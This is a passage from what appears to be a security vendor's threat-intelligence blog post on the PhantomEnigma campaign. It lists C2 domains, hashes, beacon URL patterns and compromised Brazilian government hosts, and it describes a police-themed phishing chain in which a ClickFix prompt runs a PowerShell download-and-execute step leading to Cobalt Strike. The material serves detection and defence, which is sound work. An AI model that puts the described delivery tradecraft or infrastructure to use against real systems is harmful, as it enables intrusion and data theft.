<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="515" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-1024x515.png" alt="" class="wp-image-22137" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-1024x515.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-300x151.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-768x386.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-1536x772.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-370x186.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-270x136.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30-740x372.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.40.30.png 1766w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<h2 class="wp-block-heading">A New Beacon Generation</h2>



<p class="wp-block-paragraph">The recovered sample sends a POST request to /nbw/ with a JSON body containing the machine ID, computer name, username, and campaign tag.</p>



<p class="wp-block-paragraph">This differs from the previously documented GET request:&nbsp;</p>



<p class="has-background wp-block-paragraph" style="background-color:#eef6ff">/laravel.php?api=api&amp;hash=&lt;b64&gt;&amp;message=PT1n&lt;b64&gt;&nbsp;</p>



<p class="wp-block-paragraph">The evidence therefore&nbsp;indicates&nbsp;that&nbsp;PhantomEnigma&nbsp;operates at least two beacon generations. Despite the different communication formats, both share the same Delphi/Inno&nbsp;and patched&nbsp;Boostnote&nbsp;build chain, modular JavaScript or executable payload delivery,&nbsp;and login persistence.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="422" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-1024x422.png" alt="" class="wp-image-22139" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-1024x422.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-300x124.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-768x317.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-1536x633.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-2048x845.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-370x153.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-270x111.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image3-740x305.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>customRequest function used to send the victim’s computer data</em>&nbsp;</figcaption></figure>
</div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="889" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-1024x889.png" alt="" class="wp-image-22140" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-1024x889.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-300x260.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-768x666.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-1536x1333.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-370x321.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-270x234.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4-740x642.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image4.png 1830w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>taskExecute&nbsp;function code</em>&nbsp;</figcaption></figure>
</div>


<p class="wp-block-paragraph">A fresh detonation on July 12, 2026, confirmed the behavior in a live environment. The sample resolved&nbsp;and sent a POST request to:&nbsp;<strong>hxxps://zsxocjarsate[.]com/nbw/</strong>&nbsp;</p>



<p class="wp-block-paragraph">This confirmed that the deobfuscated /nbw/ path was actively used and identified zsxocjarsate[.]com as a live C2 domain. The analysis also recovered the dropped index.js hash:<strong> 71f69978667dc421e7edf8885e9f3bde9dd527d9f7974228c9a6eac84c2ab71c</strong></p>



<p class="wp-block-paragraph">The static code&nbsp;analysis&nbsp;and&nbsp;ANY.RUN’s&nbsp;live&nbsp;sandbox&nbsp;behavior produced matching results.&nbsp;</p>



<h2 class="wp-block-heading">Why Build-Chain Evidence Outlasts Rotating Infrastructure&nbsp;</h2>



<p class="wp-block-paragraph">Known C2 domains help connect related activity, but they are not reliable enough to serve as the main detection key. The largest seed domain,&nbsp;policiacivilmg[.]com, appears in only 34 of the 231 core&nbsp;sandbox analysis sessions, or 15% of the cluster. The previously cited figure of 55 refers to index-wide DNS activity, not sessions within the core cluster.&nbsp;</p>



<p class="wp-block-paragraph">The full ten-domain seed set covers only 77 of the 231 sessions, or 33%. Two-thirds of the cluster never contacted&nbsp;any&nbsp;known C2 domain. Instead, those sessions used&nbsp;compromised .gov.br hosts or infrastructure that had already rotated out of view.&nbsp;</p>



<p class="wp-block-paragraph">To find a more stable signal, ANY.RUN analysts used <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> together with YARA and static detection tags to search across the samples’ build characteristics.</p>



<p class="wp-block-paragraph">Individually, the tags are common across the dataset:&nbsp;</p>



<ul class="wp-block-list">
<li>nodejs: 2,496&nbsp;sandbox&nbsp;sessions&nbsp;</li>



<li>inno: 10,719&nbsp;sandbox&nbsp;sessions&nbsp;</li>



<li>delphi: 17,233&nbsp;sandbox&nbsp;sessions&nbsp;</li>



<li>installer: 11,567&nbsp;sandbox&nbsp;sessions&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The combination reflects the recurring build chain: a Delphi-compiled Inno Setup installer carrying an embedded Node.js or Electron application. The Combined, however, the four tags identify exactly 231 sessions. The nodejs and inno combination alone also returns all 231, providing full recall across the cluster.</p>



<p class="wp-block-paragraph">The&nbsp;three tags come from&nbsp;ANY.RUN&nbsp;YARA&nbsp;and static detections applied to the sample bytes, including:&nbsp;</p>



<ul class="wp-block-list">
<li>Compiled with Borland Delphi&nbsp;</li>



<li>Detects&nbsp;InnoSetup&nbsp;installer&nbsp;</li>



<li>Node.js compiler detected&nbsp;</li>
</ul>



<p class="wp-block-paragraph">This means&nbsp;analysts can&nbsp;identify&nbsp;the malware by its build characteristics even as the operator changes C2 domains, IP addresses,&nbsp;and compromised delivery hosts.&nbsp;</p>



<p class="wp-block-paragraph">Use the following <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a> query to find related activity involving compromised Brazilian&nbsp;government infrastructure:&nbsp;</p>



<p class="has-background wp-block-paragraph" style="background-color:#eef6ff">TI Lookup query:&nbsp;<a href="https://intelligence.any.run/analysis/lookup#{%22query%22:%22domainName:%5C%22.gov.br%5C%22%20AND%20threatName:%5C%22nodejs%5C%22%20AND%20threatName:%5C%22inno*%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">domainName:&#8221;.gov.br&#8221;&nbsp;AND&nbsp;threatName:&#8221;nodejs&#8221;&nbsp;AND&nbsp;threatName:&#8221;inno*&#8221;</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="622" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-1024x622.png" alt="" class="wp-image-22141" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-1024x622.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-300x182.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-768x467.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-1536x933.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-370x225.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-270x164.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1-740x449.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/image-1.png 1750w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup&nbsp;showcasing&nbsp;all the relevant&nbsp;sandbox&nbsp;sessions</em>&nbsp;</figcaption></figure>
</div>


<p class="wp-block-paragraph">The initial ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> query provided a broader starting point for identifying related sandbox sessions. Analysts could then combine the build-chain tags with stronger campaign indicators, such as known C2 infrastructure, compromised .gov.br hosts, beacon IP addresses, and the /laravel.php or /nbw/ communication patterns.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Connect related&nbsp;threat&nbsp;activity before it becomes an incident.&nbsp;</span><br>
Give your SOC the context to investigate&nbsp;and respond faster.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Accelerate&nbsp;Threat&nbsp;Hunting&nbsp;&nbsp; </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Attribution with Broader Detection Coverage&nbsp;</h3>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>&nbsp;analysts&nbsp;identified&nbsp;231&nbsp;sandbox&nbsp;analyses that share the same distinctive build chain. This wider cluster gives defenders a strong basis for&nbsp;threat&nbsp;hunting, even when domains, IP addresses,&nbsp;and&nbsp;delivery&nbsp;infrastructure change.&nbsp;</p>



<p class="wp-block-paragraph">Within that cluster, approximately 108–125 analyses also contain stronger PhantomEnigma indicators, including known C2 infrastructure, compromised .gov.br hosts, beacon IPs, and the /laravel.php or /nbw/ communication patterns.</p>



<p class="wp-block-paragraph">This gives defenders two useful levels of visibility: a wider cluster for threat hunting and a more tightly attributed core for higher-confidence investigation and response. It also allows the campaign to be tracked broadly without overstating which samples can be linked directly to PhantomEnigma.</p>



<h2 class="wp-block-heading">How&nbsp;PhantomEnigma&nbsp;Rotates Its Infrastructure&nbsp;</h2>



<p class="wp-block-paragraph">PhantomEnigma&nbsp;uses several separate infrastructure layers for delivery, command-and-control communication,&nbsp;and data exfiltration. This structure helps the operation rotate domains&nbsp;and compromised hosts without changing its underlying malware.&nbsp;</p>



<p class="wp-block-paragraph">The main infrastructure includes:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Delivery domains:</strong> Cloudflare-fronted .com domains, including randomly generated names and Polícia Civil lookalikes such as policiacivilmg[.]com, pccvill[.]com, and zsxocjarsate[.]com.</li>



<li><strong>Origin infrastructure:</strong>&nbsp;DNS records linked some delivery domains to&nbsp;likely origin&nbsp;servers behind the Cloudflare proxy.&nbsp;</li>



<li><strong>Beacon infrastructure:</strong>&nbsp;Separate IP addresses&nbsp;hosted&nbsp;the /laravel.php&nbsp;system-information endpoint&nbsp;and other backdoor communications.&nbsp;</li>



<li><strong>Compromised delivery hosts:</strong>&nbsp;At least 20 legitimate Brazilian&nbsp;government portals were used to distribute malicious files or redirect victims.&nbsp;These include marapoama.sp.gov[.]br, poa.sp.gov[.]br,&nbsp;and areal.rj.gov[.]br, as well as newly observed hosts including timon.ma.gov[.]br, loginam.sesp.es.gov[.]br&nbsp;(state public security), aplicacao.cbm.mt.gov[.]br&nbsp;(fire department), prodoc.ap.gov[.]br,&nbsp;and others.&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The compromised government systems appear to be independently affected legitimate websites rather than infrastructure owned by the operator. Their use gives the campaign a trusted delivery channel while making malicious activity harder to separate from normal traffic.</p>



<p class="wp-block-paragraph">The infrastructure also rotates regularly.&nbsp;In several observed cases, the compromised delivery host&nbsp;and associated C2 domain changed together over a period of weeks.&nbsp;</p>



<p class="wp-block-paragraph">For defenders, this means blocking a single domain or IP address may provide only temporary protection. Monitoring recurring build characteristics, backdoor communication patterns,&nbsp;and newly compromised delivery infrastructure provides more durable coverage as the campaign evolves.&nbsp;</p>



<h3 class="wp-block-heading">Observed&nbsp;PhantomEnigma&nbsp;C2 Infrastructure&nbsp;</h3>



<p class="wp-block-paragraph">The table below shows representative domains linked to the campaign&nbsp;and illustrates how&nbsp;PhantomEnigma&nbsp;combines police-themed lookalikes with randomly generated domain names.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-348"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="9"
           data-wpID="348"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-FFFFFF wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Domain                     </th>
                                                <th class="wpdt-cell wpdt-bc-FFFFFF wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Role or naming pattern                     </th>
                                                <th class="wpdt-cell wpdt-bc-FFFFFF wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Observed status                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        policiacivilmg[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Polícia Civil MG lookalike                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        No longer active at the time of review                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        pccvill[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Police-themed lookalike                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        No longer active at the time of review                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        pccvioo[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Police-themed lookalike                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        No longer active at the time of review                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        dahieenloo[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Randomly generated domain                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Recently observed                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        psznaoehteeh[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Randomly generated domain                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Active in recent activity                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        taaeiuep[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Domain linked to Inno Setup and Procuração Digital activity                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        No longer active at the time of review                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        eeresofeuae[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Randomly generated domain                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Recently observed                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        zsxocjarsate[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Live /nbw/ backdoor endpoint confirmed during re-detonation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Confirmed active on July 12, 2026                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-348'>
table#wpdtSimpleTable-348{ table-layout: fixed !important; }
table#wpdtSimpleTable-348 td, table.wpdtSimpleTable348 th { white-space: normal !important; }
.wpdt-bc-FFFFFF { background-color: #FFFFFF !important;}
</style>




<p class="wp-block-paragraph">The changing domain set reinforces why defenders should not rely on a single IOC or static blocklist. Detection should also cover the recurring build chain&nbsp;and backdoor communication patterns.&nbsp;</p>



<h3 class="wp-block-heading">The&nbsp;Ofício-PC Phishing&nbsp;and Delivery Operation&nbsp;</h3>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="580" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-1024x580.png" alt="" class="wp-image-22143" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-1024x580.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-300x170.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-768x435.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-1536x870.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-270x153.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18-740x419.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-20.57.18.png 1936w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Ofício-PC phishing</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">During the investigation, ANY.RUN analysts examined what initially appeared to be a separate Brazil-focused phishing operation. The campaign used fake <strong>“Ofício”</strong> and <strong>“Intimação Polícia Civil”</strong> PDF documents designed to look like official law-enforcement communications.</p>



<p class="wp-block-paragraph">The files followed a consistent naming pattern, including examples such as DOC_&lt;CNPJ&gt;.pdf,&nbsp;and some&nbsp;contained&nbsp;the EXIF title&nbsp;<strong>“Ofício&nbsp;Polícia Civil.”</strong>&nbsp;Victims were encouraged to scan&nbsp;a QR code embedded in the document, which redirected them&nbsp;through a bare-IP PHP cloaking service.&nbsp;</p>



<p class="wp-block-paragraph">The cloaker classified visitors as either “Real” or “Fake” and redirected selected users to a fraudulent <strong>“Verificação de Acesso”</strong> page. This page used a ClickFix-style prompt that instructed the victim to run a PowerShell command. The command downloaded oficioprotocolo.tng and executed it through iex, allowing the attack to continue beyond the initial PDF lure.</p>



<p class="wp-block-paragraph">ANY.RUN&nbsp;analysts&nbsp;identified&nbsp;<strong>99&nbsp;sandbox&nbsp;analyses</strong>&nbsp;associated with this delivery arm, with a more tightly defined core of 95.&nbsp;&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="845" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-845x1024.png" alt="" class="wp-image-22144" style="aspect-ratio:0.8251980106833671;width:550px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-845x1024.png 845w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-247x300.png 247w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-768x931.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-370x449.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-270x327.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34-740x897.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/07/Screenshot-2026-07-15-at-05.55.34.png 1084w" sizes="auto, (max-width: 845px) 100vw, 845px" /><figcaption class="wp-element-caption"><em>Malicious PDF file&nbsp;analyzed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox</em>&nbsp;</figcaption></figure>
</div>


<p class="wp-block-paragraph">The activity was&nbsp;observed&nbsp;between January&nbsp;and April 2026&nbsp;and peaked in February, when 75 related&nbsp;analyses were recorded. No&nbsp;new activity&nbsp;appeared in the dataset after April 23, 2026. However, the backend IP 195.177.94[.]103 remained active as of July 10, 2026, suggesting that parts of the infrastructure were still operational even after the observed delivery activity declined.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">See the full attack path behind suspicious files and links.</span><br>
Give your SOC the evidence to investigate faster.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phantomenigma-research&amp;utm_term=160726&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Gain Full Behavior Visibility </a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">From&nbsp;ClickFix&nbsp;to Cobalt Strike&nbsp;</h3>



<p class="wp-block-paragraph">The final activity visible inside the&nbsp;sandbox&nbsp;led to the&nbsp;Zabbxsoftware&nbsp;<strong>“Zab agent”</strong>&nbsp;kit. This infrastructure used operator-created paths such as:&nbsp;</p>



<ul class="wp-block-list">
<li>/zab/agent/send&nbsp;</li>



<li>/api/request/&lt;uuid&gt;/status&nbsp;</li>
</ul>



<p class="wp-block-paragraph">The kit first communicated with&nbsp;logs.zabbxsoftware[.]com&nbsp;and later rotated to&nbsp;oauth.openvpnet[.]com. The delivery chain&nbsp;ultimately led&nbsp;to a&nbsp;Shellter-packed Cobalt Strike payload.&nbsp;</p>



<p class="wp-block-paragraph">A loader named&nbsp;oficio&lt;digits&gt;PCAP.exe, with SHA-256 beginning 7de52b73…, appeared in eight&nbsp;sandbox&nbsp;analyses&nbsp;and received a clean&nbsp;verdict. External malware repositories&nbsp;and vendors also&nbsp;identified&nbsp;the file as associated with Cobalt Strike&nbsp;and&nbsp;Shellter.&nbsp;</p>



<h3 class="wp-block-heading">Why We Link This Activity to&nbsp;PhantomEnigma&nbsp;</h3>



<p class="wp-block-paragraph">The strongest connection is the use of the same compromised government infrastructure.&nbsp;</p>



<p class="wp-block-paragraph">At least four&nbsp;legitimate .gov.br&nbsp;and .jus.br hosts were used by both the&nbsp;Ofício-PC phishing arm&nbsp;and the&nbsp;PhantomEnigma&nbsp;Inno/Node.js installer activity.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-349"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="5"
           data-wpID="349"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Compromised government host                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        PhantomEnigma installer analyses                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-FFFFFF"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Ofício-PC sandboxanalyses                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        timon.ma.gov[.]br                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        11                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        3                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
